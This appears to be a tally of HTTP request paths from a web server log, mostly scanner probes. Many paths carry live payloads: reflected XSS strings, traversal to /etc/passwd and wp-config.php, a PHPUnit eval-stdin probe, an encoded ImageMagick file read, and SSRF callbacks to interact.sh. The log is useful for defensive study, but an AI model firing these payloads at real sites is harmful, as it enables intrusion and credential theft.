1	GET	`/system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ==`	HTTP/1.1
1	GET	`/t000/login-img-3.svg`	HTTP/1.1
1	GET	`/template/920ka/css/lsy.css`	HTTP/1.1
1	GET	`/template/920ka/js/woodyapp.js`	HTTP/1.1
1	GET	`/template/css/login.css`	HTTP/1.1
1	GET	`/template/mb/lang/text-zh.json`	HTTP/1.1
1	GET	`/template/tmp1/js/common.js`	HTTP/1.1
1	GET	`/test/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/themes/pay/assets/core.css`	HTTP/1.1
1	GET	`/thriveGame.css`	HTTP/1.1
1	GET	`/ui/vropspluginui/rest/services/getstatus`	HTTP/1.1
1	GET	`/uis/app/get/config`	HTTP/1.1
1	GET	`/uploads/20210928/01737e4f85f971bdf4d892dfaee6579c.png`	HTTP/1.1
1	GET	`/uploads/admin/202103/60584c5b88017.png`	HTTP/1.1
1	GET	`/user/Login`	HTTP/1.1
1	GET	`/v1/getConfig`	HTTP/1.1
1	GET	`/v1/management/tenant/getSpeedDomain`	HTTP/1.1
1	GET	`/v2/block/home/app/hot`	HTTP/1.1
1	GET	`/v2/game/rooms`	HTTP/1.1
1	GET	`/v6/getAppContent`	HTTP/1.1
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/verification.asp`	HTTP/1.1
1	GET	`/verify.php?confirm_hash&id=1`	HTTP/1.1
1	GET	`/views/commData/commonSite.js`	HTTP/1.1
1	GET	`/views/home/home.js`	HTTP/1.1
1	GET	`/wap.html`	HTTP/1.1
1	GET	`/wap/`	HTTP/1.1
1	GET	`/wap/api/exchangerateuserconfig!get.action`	HTTP/1.1
1	GET	`/wap/assets/images/icon1/12306.png`	HTTP/1.1
1	GET	`/wap/static//images/index_tzjr.png`	HTTP/1.1
1	GET	`/wap/trading/lastKlineParameter`	HTTP/1.1
1	GET	`/wap`	HTTP/1.1
1	GET	`/waplogin.php`	HTTP/1.1
1	GET	`/web/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/website/wp-includes/wlwmanifest.xml`	HTTP/1.1
2	GET	`/whoAmI/`	HTTP/1.1
1	GET	`/wordpress/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E`	HTTP/1.1
1	GET	`/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https[:]//interact[.]sh`	HTTP/1.1
1	GET	`/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>`	HTTP/1.1
1	GET	`/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>`	HTTP/1.1
1	GET	`/wp-admin/admin-post.php?local-destination-id=/etc/passwd&local-download=/etc/passwd&page=pb_backupbuddy_destinations`	HTTP/1.1
1	GET	`/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php`	HTTP/1.1
1	GET	`/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/e-search/tmpl/date_select.php?date-from=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/gwyns-imagemap-selector/popup.php?class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&id=1`	HTTP/1.1
1	GET	`/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E`	HTTP/1.1
1	GET	`/wp-content/plugins/wp-swimteam/include/user/download.php?abspath=/usr/share/wordpress&contenttype=text/html&file=/etc/passwd&filename=/etc/passwd&transient=1`	HTTP/1.1
1	GET	`/wp-content/uploads/wp-security-audit-log/failed-logins/`	HTTP/1.1
1	GET	`/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp1/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wp2/wp-includes/wlwmanifest.xml`	HTTP/1.1
1	GET	`/wps/PA_WCM_Authoring_UI/proxy/http/interact.sh`	HTTP/1.1
1	GET	`/ws/index/getTheLotteryInitList`	HTTP/1.1
1	GET	`/xianyu/`	HTTP/1.1
1	GET	`/xianyu/image/jiantou.png`	HTTP/1.1
1	GET	`/xmlrpc.php?rsd`	HTTP/1.1
1	GET	`/xy/`	HTTP/1.1
1	GET	`/xy/image/jiantou.png`	HTTP/1.1
1	GET	`/yinjian/`	HTTP/1.1
1	GET	`/zz/address.php?gid=651`	HTTP/1.1
1	GET	`/zz2/address.php?gid=651`	HTTP/1.1
1	POST	`/SamlResponseServlet`	HTTP/1.1
1	POST	`/admin/asign-single-student-subjects.php`	HTTP/1.1
1	POST	`/api/GetConfigByKeys?keys=of_we`	HTTP/1.1
1	POST	`/api/app-info`	HTTP/1.1
1	POST	`/api/config/getwebsitename`	HTTP/1.1
1	POST	`/api/getUserCertificationStatus`	HTTP/1.1
1	POST	`/api/im/conf`	HTTP/1.1
2	POST	`/api/link/platform`	HTTP/1.1
1	POST	`/api/linkPF`	HTTP/1.1
1	POST	`/api/notice`	HTTP/1.1
1	POST	`/api/other/appSetting`	HTTP/1.1
1	POST	`/api/snapshots`	HTTP/1.1
1	POST	`/api/system/system/config/get`	HTTP/1.1
1	POST	`/api/system/systemConfigs/getCustomerServiceLink`	HTTP/1.1
1	POST	`/api/user/ismustmobile`	HTTP/1.1
1	POST	`/api/user/mobilelogin`	HTTP/1.1
1	POST	`/api/v1/app-info`	HTTP/1.1
1	POST	`/api/v1/method.callAnon/sendForgotPasswordEmail`	HTTP/1.1
1	POST	`/apply.cgi`	HTTP/1.1
1	POST	`/auth/requestreset`	HTTP/1.1
1	POST	`/biz/server/config`	HTTP/1.1
3	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/boafrm/formSysCmd`	HTTP/1.1
1	POST	`/en/php/usb_sync.php`	HTTP/1.1
1	POST	`/goform/setmac`	HTTP/1.1
1	POST	`/index.php/User/sendsmscode`	HTTP/1.1
1	POST	`/jolokia/read/getDiagnosticOptions`	HTTP/1.1
1	POST	`/kkrp/site/info`	HTTP/1.1
1	POST	`/km.asmx/getPlatParam`	HTTP/1.1
1	POST	`/magmi/web/magmi_run.php`	HTTP/1.1
1	POST	`/magmi/web/magmi_saveprofile.php`	HTTP/1.1
1	POST	`/melody/api/v1/pageconfig/list`	HTTP/1.1
1	POST	`/site/api/v1/site/vipExclusiveDomain/getGuestDomain`	HTTP/1.1
1	POST	`/system/sharedir.php`	HTTP/1.1
1	POST	`/upload`	HTTP/1.1
1	POST	`/user/getAllNicknames`	HTTP/1.1
1	POST	`/v2/game/rooms`	HTTP/1.1
1	POST	`/wap/forward`	HTTP/1.1
1	POST	`/wls-wsat/RegistrationRequesterPortType`	HTTP/1.1
1	POST	`/wp-admin/admin-ajax.php?action=wpt_admin_update_notice_option`	HTTP/1.1
1	POST	`/wp-admin/admin-ajax.php`	HTTP/1.1
1	POST	`/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1`	HTTP/1.1
2	PRI	`*`	HTTP/2.0